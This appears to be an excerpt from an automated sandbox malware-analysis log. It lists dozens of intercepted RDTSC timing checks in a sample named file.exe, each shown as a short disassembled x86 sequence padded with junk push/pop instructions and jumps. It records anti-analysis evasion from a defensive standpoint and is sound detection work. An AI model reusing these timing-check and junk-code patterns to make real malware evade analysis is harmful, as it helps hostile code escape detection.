Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80AE35 second address: 80AE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C698AAEF7h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F6C698AAEF4h 0x00000016 jc 00007F6C698AAEE6h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80B154 second address: 80B160 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80B160 second address: 80B166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80B166 second address: 80B16A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80B16A second address: 80B170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80B170 second address: 80B18C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F6C6956DA57h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80B18C second address: 80B1B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F6C698AAEEDh 0x0000000d jmp 00007F6C698AAEEDh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80B314 second address: 80B31F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80B463 second address: 80B467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80B89D second address: 80B8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81151F second address: 811524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8101DD second address: 8101E3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8101E3 second address: 8101ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8101ED second address: 8101F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8101F1 second address: 810212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C698AAEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6C698AAEEAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 810212 second address: 810216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 810785 second address: 810789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 810938 second address: 810941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 810941 second address: 810945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 810945 second address: 810949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 810949 second address: 810959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F6C698AAEEEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 810BDA second address: 810C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F6C6956DA5Fh 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F6C6956DA4Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 810C09 second address: 810C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F6C698AAEF3h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810C26 second address: 810C30 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6C6956DA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810F18 second address: 810F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810F21 second address: 810F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810F2A second address: 810F36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810F36 second address: 810F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810F3A second address: 810F5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6C698AAEF8h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EB4D second address: 79EB51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EB51 second address: 79EB73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F6C698AAEF9h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EB73 second address: 79EBA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F6C6956DA4Ch 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F6C6956DA4Dh 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007F6C6956DA4Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EBA5 second address: 79EBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6C698AAEF4h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EBC2 second address: 79EBCC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6C6956DA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EBCC second address: 79EBE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F6C698AAEE6h 0x00000009 jng 00007F6C698AAEE6h 0x0000000f jnp 00007F6C698AAEE6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816A0A second address: 816A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F6C6956DA46h 0x0000000d jmp 00007F6C6956DA51h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816FA7 second address: 816FB1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6C698AAEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816FB1 second address: 816FBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6C6956DA46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816FBB second address: 816FC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816FC1 second address: 816FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jc 00007F6C6956DA4Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816FD2 second address: 816FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816FD9 second address: 816FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817169 second address: 817194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C698AAEF2h 0x00000009 pop edi 0x0000000a pushad 0x0000000b jmp 00007F6C698AAEF0h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817194 second address: 8171A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6C6956DA46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8171A0 second address: 8171A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8175ED second address: 817605 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6C6956DA46h 0x00000008 je 00007F6C6956DA46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnp 00007F6C6956DA4Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817BD3 second address: 817BE3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a ja 00007F6C698AAEE6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817BE3 second address: 817BE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817BE7 second address: 817C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C698AAEEBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jc 00007F6C698AAEE6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817C02 second address: 817C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817C06 second address: 817C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jp 00007F6C698AAEE6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817C1A second address: 817C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81EEDB second address: 81EEDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79815B second address: 79815F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79815F second address: 79816F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F6C698AAEE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81E73F second address: 81E744 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81EB4F second address: 81EB61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C698AAEEEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81EB61 second address: 81EB67 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 820F57 second address: 820F5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 820F5B second address: 820F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8210C1 second address: 8210C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8275A1 second address: 8275C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA4Dh 0x00000007 jg 00007F6C6956DA46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F6C6956DA46h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8275C0 second address: 8275C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794BEC second address: 794BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794BF4 second address: 794BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794BFD second address: 794C11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA50h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794C11 second address: 794C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8269FF second address: 826A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6C6956DA46h 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 826E7D second address: 826E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6C698AAEEFh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 826E96 second address: 826E9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 827147 second address: 827153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jng 00007F6C698AAEE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 827153 second address: 82718B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jbe 00007F6C6956DA46h 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F6C6956DA57h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e je 00007F6C6956DA4Eh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82718B second address: 8271B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jnp 00007F6C698AAEE6h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F6C698AAEE6h 0x0000001a jmp 00007F6C698AAEF0h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8271B5 second address: 8271B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82CF82 second address: 82CF99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F6C698AAEECh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82CF99 second address: 82CF9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82CF9F second address: 82CFBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C698AAEEFh 0x00000009 ja 00007F6C698AAEE6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D140 second address: 82D150 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6C6956DA46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D150 second address: 82D15A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6C698AAEE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D15A second address: 82D15E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D3D7 second address: 82D3E3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6C698AAEEEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82DDD4 second address: 82DDDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82DDDA second address: 82DDFA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6C698AAEF8h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830FAE second address: 830FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jnp 00007F6C6956DA46h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830FBC second address: 830FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6C698AAEEFh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830707 second address: 83070B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83070B second address: 83072F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F6C698AAEFEh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83072F second address: 830757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA53h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6C6956DA4Fh 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830757 second address: 830787 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F6C698AAEF1h 0x00000012 pop eax 0x00000013 jmp 00007F6C698AAEF1h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830A10 second address: 830A16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8373F0 second address: 83740E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C698AAEF8h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 837560 second address: 837595 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6C6956DA46h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jbe 00007F6C6956DA46h 0x00000013 pop edx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 jns 00007F6C6956DA46h 0x0000001e jmp 00007F6C6956DA56h 0x00000023 pop edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8376E6 second address: 8376EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8376EC second address: 8376F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 837C47 second address: 837C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8389E3 second address: 8389F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F6C6956DA46h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8389F4 second address: 8389F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838F80 second address: 838F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F6C6956DA56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C341 second address: 83C36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jg 00007F6C698AAEEEh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6C698AAEF9h 0x00000012 rdtsc
